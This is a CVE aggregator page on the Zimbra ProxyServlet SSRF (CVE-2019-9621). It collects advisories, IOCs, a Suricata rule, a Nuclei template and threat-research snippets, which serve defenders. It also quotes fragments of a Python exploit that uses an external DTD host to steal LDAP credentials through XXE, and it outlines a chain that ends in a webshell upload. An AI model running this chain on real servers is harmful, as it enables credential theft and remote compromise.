CVE-2019-9621
published 2019-04-30CVE-2019-9621: Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via…
PriorityP190high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-07-28
Exploited in the wild
EPSS
80.91%
99.6th percentile
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synacor | zimbra_collaboration_suite | < 8.6.0 | 8.6.0 |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | >= 8.7.0 < 8.7.11 | 8.7.11 |
| synacor | zimbra_collaboration_suite | >= 8.8.0 < 8.8.9 | 8.8.9 |
Detection & IOCsextracted from sources · hover to see the quote
yara↗
regex('root:.*:0:0:', body) and contains(body, "response schema") and contains(header, "text/html")- →Detect exploitation attempts by monitoring POST requests to /autodiscover or /Autodiscover/Autodiscover.xml with XML bodies containing external entity (XXE) declarations (DOCTYPE with SYSTEM or external DTD references). ↗
- →Detect SSRF exploitation by monitoring POST requests to /service/proxy/ (or /service/proxy?target=) where the target parameter points to internal addresses such as 127.0.0.1:7071. ↗
- →Alert on POST requests to /service/extension/clientUploader/upload bearing a ZM_ADMIN_AUTH_TOKEN cookie, which indicates the webshell upload stage of the exploit chain. ↗
- →Monitor HTTP Host header manipulation: exploit sends Host header set to an internal port (e.g., foo:7071) to abuse the ProxyServlet SSRF. ↗
- →Use Shodan query to identify exposed Zimbra instances: html:"Zimbra Collaboration Suite Web Client" ↗
- →Successful XXE exploitation returns content matching root:.*:0:0: (passwd file) in the HTTP response body; monitor for this pattern in Zimbra autodiscover responses. ↗
- →Monitor for JSP webshell files appearing under the Zimbra /downloads/ path following a clientUploader upload request. ↗
- ·The SSRF exploit requires a prior XXE step (CVE-2019-9670) to extract the zimbra LDAP password; detections should account for the full chained attack sequence, not just the SSRF in isolation. ↗
- ·The Metasploit module defaults to SSL on port 8443; detection rules targeting plain HTTP on port 80 may miss exploit traffic. ↗
- ·The module temporarily disables SSL during the XXE stage (datastore['SSL'] = false) before re-enabling it, so both HTTP and HTTPS traffic should be inspected. ↗
- ·The exploit uses a random-length alpha-lower string for the JSP webshell filename, so static filename-based detection will not reliably catch the uploaded shell. ↗
- ·The Nuclei template matcher requires all three conditions simultaneously (passwd regex match, 'response schema' in body, text/html in header); partial matches alone are insufficient for confident detection. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
cisa·2025-07-07·CVSS 7.5
CVE-2019-9621 [HIGH] CWE-918 Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Vulnerability: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery (SSRF) vulnerability via the ProxyServlet component.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories ; https://wiki.zimbra.com/wiki/Security_Center ; https://nvd.nist.gov/vuln/detail/CVE-2019-9621
Remediation Due Date: 2025-07-28
GHSA
GHSA-gf2h-5qx6-v9fr: Zimbra Collaboration Suite before 8
ghsa_unreviewed·2022-05-24
CVE-2019-9621 [HIGH] CWE-918 GHSA-gf2h-5qx6-v9fr: Zimbra Collaboration Suite before 8
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
vulncheck·2019·CVSS 7.5
CVE-2019-9621 [HIGH] CWE-918 Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery (SSRF) vulnerability via the ProxyServlet component.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html; https://ics-cert.kaspersky.com/publications/reports/2025/03/25/apt-and-financial-attacks-on-industrial-organizations-in-q4-2024/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https:/
Suricata
ET EXPLOIT Zimbra <8.8.11 - XML External Entity Injection/SSRF Attempt (CVE-2019-9621)
suricata·2021-01-27·CVSS 7.5
CVE-2019-9621 [HIGH] ET EXPLOIT Zimbra <8.8.11 - XML External Entity Injection/SSRF Attempt (CVE-2019-9621)
ET EXPLOIT Zimbra $HOME_NET any (msg:"ET EXPLOIT Zimbra "; content:""; reference:url,www.exploit-db.com/exploits/46967; reference:url,packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html; reference:cve,2019-9621; reference:cve,2021-2109; classtype:attempted-user; sid:2031562; rev:1; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2021_01_27, cve CVE_2021_2109, deployment Perimeter, confidence Medium, signature_severity Major, updated_at 2021_01_27;)
Exploit-DB
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
exploitdb·2019-06-05
CVE-2019-9621 Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
Zimbra |");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|'
print(base_url)
#dtd file url
dtd_url="https://k8gege.github.io/zimbra.dtd"
"""
">
">
"""
xxe_data = r"""
%dtd;
%all;
]>
aaaaa
&fileContents;
""".format(dtd=dtd_url)
#XXE stage
headers = {
"Content-Type":"application/xml"
}
print("[*] Get User Name/Password By XXE ")
r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
#print r.text
if 'response schema not available' not in r.text:
print("have no xxe")
exit()
#low_token Stage
import re
pattern_name = re.compile(r"\n.*?(.*?)")
pattern_password = re.compile(r"\n.*?(.*?)")
username = pattern_name.findall(r.text)[0][2]
password = pattern_password.findall(r.text)[0][2]
print(username)
Exploit-DB
Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
exploitdb·2019-04-12
CVE-2019-9670 Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF',
'Description' => %q{
This module exploits an XML external entity vulnerability and a
server side request forgery to get unauthenticated code execution
on Zimbra Collaboration Suite. The XML external entity vulnerability
in the Autodiscover Servlet is used to read a Zimbra configuration
file that contains an LDAP password for the 'zimbra' account. The
zimbra credentials are then used to get a user authentication cookie
with an AuthRequest message. Using the user cookie, a se
Metasploit
Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
metasploit
Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the Client Upload servlet is used to upload a JSP webshell that can be triggered from th
Nuclei
Zimbra Collaboration Suite - SSRF
nuclei·CVSS 7.5
CVE-2019-9621 [HIGH] Zimbra Collaboration Suite - SSRF
Zimbra Collaboration Suite - SSRF
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
Template:
id: CVE-2019-9621
info:
name: Zimbra Collaboration Suite - SSRF
author: riteshs4hu
severity: high
description: |
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
impact: |
Attackers can perform SSRF, potentially leading to internal network access or further exploitation.
remediation: |
Update to the latest patched versions: 8.6 patch 13, 8.7.11 patch 10, 8.8.10 patch 7, or 8.8.11 patch 3 or later.
reference:
- https://github.co
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
## Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen 2023/09/18 Read time: ( words)
Save to Folio
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca . Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
While monitoring the group, we managed to obtain an interestin
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
# Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen
2023/09/18
Read time: ( words)
Save to Folio
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca. Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
While monitoring the group, we managed to obtain an interesting
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
## Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen Sep 18, 2023 Read time: ( words)
Save to Folio
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca . Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
While monitoring the group, we managed to obtain an interest
Fortinet
Deconstructing an Evasive Formbook Campaign Leveraging COVID-19 Themes | FortiGuard Labs
blogs_fortinet·2020-04-21
Deconstructing an Evasive Formbook Campaign Leveraging COVID-19 Themes | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Deconstructing an Evasive Formbook Campaign Leveraging COVID-19 Themes
By Fred Gutierrez and Val Saengphaibul | April 21, 2020
FortiGuard Labs Threat Analysis Report
Introduction
Affected platforms: Windows
Impacted parties: Companies that engage with biomedical firms
Impact: Remote control of infected computer, information stealing, keylogger
Severity level: High
During our research into COVID-19 threats, FortiGuard Labs has run into a number of unique types of spearphishing lures. For example, one of these targets companies that engage with biomedical firms, and as a result, they may be at risk of losing financial resources, data, or intellectual property.
Within the last couple of days, for example, our spam traps noticed the following email sent ou
http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.htmlhttp://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rcehttps://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.htmlhttps://blog.zimbra.com/2019/03/9826/https://bugzilla.zimbra.com/show_bug.cgi?id=109127https://wiki.zimbra.com/wiki/Security_Centerhttps://wiki.zimbra.com/wiki/Zimbra_Security_Advisorieshttps://www.exploit-db.com/exploits/46693/http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.htmlhttp://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rcehttps://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.htmlhttps://blog.zimbra.com/2019/03/9826/https://bugzilla.zimbra.com/show_bug.cgi?id=109127https://wiki.zimbra.com/wiki/Security_Centerhttps://wiki.zimbra.com/wiki/Zimbra_Security_Advisorieshttps://www.exploit-db.com/exploits/46693/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-9621
2019-04-30
Published
2025-07-07
Added to CISA KEV
Exploited in the wild